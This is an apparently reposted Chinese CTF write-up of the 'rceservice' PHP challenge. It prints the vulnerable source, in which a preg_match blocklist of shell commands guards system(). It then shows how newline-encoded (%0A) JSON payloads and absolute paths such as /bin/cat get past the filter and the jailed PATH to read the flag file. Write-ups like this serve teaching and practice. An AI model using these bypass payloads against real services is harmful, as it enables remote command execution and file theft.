ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

RCE和preg_match绕过

2021-09-29 20:02:48  阅读:270  来源: 互联网

标签:preg cmd echo json 0A RCE match


首先以题为例

 进来后是这个界面

题目告诉我们用json格式所以我们输入{"cmd":"ls"}查看有啥文件

发现有index.php这个文件里面有源码,这个题目一开始是就给了源码

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>
对源码进行分析发现他用preg_match对一些命令函数进行了过滤,过滤的函数还挺多。但是preg_match只能匹配第一行的数据,并且.无法与换行进行匹配,所以我们这里考虑用换行进行绕过换行符%0A。?cmd={%0A"cmd":%20"ls%20/home/rceservice"%0A}看看这个目录下有什么

发现flag在这个目录下

 由于前面putenv('PATH=/home/rceservice/jail');所以我们不能用相对路径,必须用绝对路径

?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}

最后读取成功 

标签:preg,cmd,echo,json,0A,RCE,match
来源: https://blog.csdn.net/weixin_55190422/article/details/120555066

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有